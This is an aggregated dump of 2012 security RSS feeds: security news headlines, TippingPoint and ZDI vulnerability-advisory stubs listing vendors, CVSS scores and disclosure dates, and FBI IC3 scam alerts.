==> Study finds spear phishing at heart of most targeted attacks

http://feeds.pheedo.com/tt/1323 Malicious file attachments are typically used as the payload, according to a report issued this week by Trend Micro. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Security business analyst – a role whose time has come

http://feeds.pheedo.com/tt/1323 For effective information security, India Inc requires security business analysts. These should be people who understand security, technology and the business. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Mitigate phishing attacks in the cloud: A how-to

http://feeds.pheedo.com/tt/1323 As Indian enterprises increasingly move to the cloud, so are phishing attempts. Here are some ways to mitigate the risks of phishing in the cloud. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Study finds most antivirus products ineffective

http://feeds.pheedo.com/tt/1323 Slow updates to signature databases cause some antivirus products to be ineffective against known threats, according to a study by security firm Imperva. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Zenmap tutorial: Mapping networks using Zenmap profiles

http://feeds.pheedo.com/tt/1323 Video: In this Zenmap tutorial screencast, Keith Barker of CBT Nuggets explains how to efficiently map networks graphically using Zenmap profiles. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Combat social engineering attacks with these mantras

http://feeds.pheedo.com/tt/1323 Of all the security threats, those involving the human angle are perhaps the deadliest. Keep social engineering at bay with these tips. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Phishing attack, stolen credentials sparked South Carolina breach

http://feeds.pheedo.com/tt/1323 A phishing attack and stolen credentials gave an attacker access to the systems of the South Carolina Department of Revenue for two months. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Cloud security begins with the contract, says expert

http://feeds.pheedo.com/tt/1323 Enterprises must empower their legal teams to ask the right questions and write contracts based on risk management, explains Tom Kellermann of Trend Micro. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Deception, proactive defenses can better protect IP, says expert

http://feeds.pheedo.com/tt/1323 Deceptive environments, phony data in the enterprise can fool attackers and increase the cost of hacking, says noted cybersecurity expert Paul Kurtz. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> After antimalware: Moving toward endpoint antivirus alternatives

http://feeds.pheedo.com/tt/1323 Is it time to "cut the cord" with endpoint antimalware? Matthew Pascucci discusses possible antivirus alternatives. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> PCI Council: Risk assessment methodology unique to company environment

http://feeds.pheedo.com/tt/1323 The PCI Risk Assessment Special Interest Group concludes that risk assessments are based on a company's unique risk tolerance and environment. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> NASA to deploy whole-disk encryption following breach

http://feeds.pheedo.com/tt/1323 Stolen laptop contained the sensitive data on a large number of employees and contractors. The information was not encrypted. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Adobe investigates scope of customer forum breach

http://feeds.pheedo.com/tt/1323 Names, email addresses and encrypted passwords of thousands of customers may have been exposed in a breach of the software maker's customer forum. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Genpact boosts security management with SIEM tool

http://feeds.pheedo.com/tt/1323 An early adopter of SIEM technology in India, leading BPO firm Genpacts nine-year journey to SIEM nirvana forms the focus of this case study. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> TPTI-12-05 - Oracle AutoVue ActiveX SetMarkupMode Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-06 - Hewlett-Packard Data Protector DtbClsAddObject Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-04 - Samba NDR PULL EVENTLOG ReportEventAndSourceW Heap Overflow Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-03 - Adobe Reader X True Type Font MINDEX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of an Oracle product.

==> TPTI-12-02 - Novell iPrint Client ActiveX GetPrinterURLList2 Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-01 - Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-15 - Novell ZENWorks Software Packaging ISGrid.Grid2.1 bstrSearchText Parameter Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENWorks. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-14 - Adobe Shockwave DEMX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-13 - McAfee SaaS myCIOScn.dll Scan Method Script Injection Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> TPTI-11-12 - McAfee SaaS MyAsUtil5.2.0.603.dll SecureObjectFactory Instantiation Design Flaw Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> Citadel Malware Continues to Deliver Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (November 26, 2012)

http://www.ic3.gov/rss/news.xml

==> Holiday Shopping Tips

http://www.ic3.gov/rss/news.xml

==> Justice Department Officials Raise Awareness of Disaster Fraud Hotline

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (October 23, 2012)

http://www.ic3.gov/rss/news.xml

==> Smartphone Malware Safety Tips

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (September 19, 2012)

http://www.ic3.gov/rss/news.xml

==> Fraud Alert Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud

http://www.ic3.gov/rss/news.xml

==> Lawyers' Identities Being Used For Fake Websites and Solicitations

http://www.ic3.gov/rss/news.xml

==> Citadel Malware Continues to Deliver Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (August 08, 2012)

http://www.ic3.gov/rss/news.xml

==> Citadel Malware Delivers Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (May 23, 2012)

http://www.ic3.gov/rss/news.xml

==> IC3 2011 Annual Report on Internet Crime Released

http://www.ic3.gov/rss/news.xml

==> Malware Installed on Travelers' Laptops Through Software Updates on Hotel Internet Connections

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (April 20, 2012)

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (March 27, 2012)

http://www.ic3.gov/rss/news.xml

==> U.S. Law Firms Continue to be the Target of a Counterfeit Check Scheme

http://www.ic3.gov/rss/news.xml

==> Justice Department and FBI Raise Awareness of Disaster Fraud Hotline

http://www.ic3.gov/rss/news.xml

==> New Variation on Telephone Collection Scam Related to Delinquent Payday Loans

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (February 17, 2012)

http://www.ic3.gov/rss/news.xml

==> Timeshare Marketing Scams

http://www.ic3.gov/rss/news.xml

==> Fraud Alert Involving E-mail Intrusions to Facilitate Wire Transfers Overseas

http://www.ic3.gov/rss/news.xml

==> Joint FBI and DHS Public Service Announcement: Best Practices For Recovery From the Malicious Erasure of Files

http://www.ic3.gov/rss/news.xml

==> ZDI-CAN-1667: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1608: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1601: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Soroush Dalili' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1595: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 8.5 (AV:N/AC:L/Au:N/C:C/I:P/A:N) severity vulnerability discovered by 'Mak Kolybabi' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1591: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1589: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1578: MySQL

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1571: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1559: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Nicolas Gregoire' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1551: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Francis Provencher From Protek Research Lab's' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1546: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1545: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1544: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1542: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1517: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1516: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-11-21, 19 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1687: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1668: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1664: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1663: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1662: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.7 (AV:U/AC:U/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1661: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:C/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1660: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1659: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1650: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1647: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1646: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1644: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1643: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1641: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1628: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1620: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1615: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1614: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1613: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1612: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1611: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1607: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1606: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1603: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher & Paul Bates' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1566: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-11-19, 21 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1563: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.4 (AV:A/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-11-14, 26 days ago. The vendor is given until 2013-05-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1543: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-14, 26 days ago. The vendor is given until 2013-05-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1518: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-14, 26 days ago. The vendor is given until 2013-05-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1594: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Chris Ries' was reported to the affected vendor on: 2012-10-29, 42 days ago. The vendor is given until 2013-04-27 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1580: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Chris Ries' was reported to the affected vendor on: 2012-10-29, 42 days ago. The vendor is given until 2013-04-27 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1534: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-10-29, 42 days ago. The vendor is given until 2013-04-27 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1582: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 47 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1577: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 47 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1473: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-10-24, 47 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1433: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-08-21, 111 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1339: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-08-21, 111 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1590: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'James Forshaw (tyranid)' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1587: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'James Forshaw (tyranid)' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1568: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1536: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1535: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 139 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1528: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1527: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'James Burton' and ' Insomnia Security' was reported to the affected vendor on: 2012-03-14, 271 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1513: Hewlett-Packard

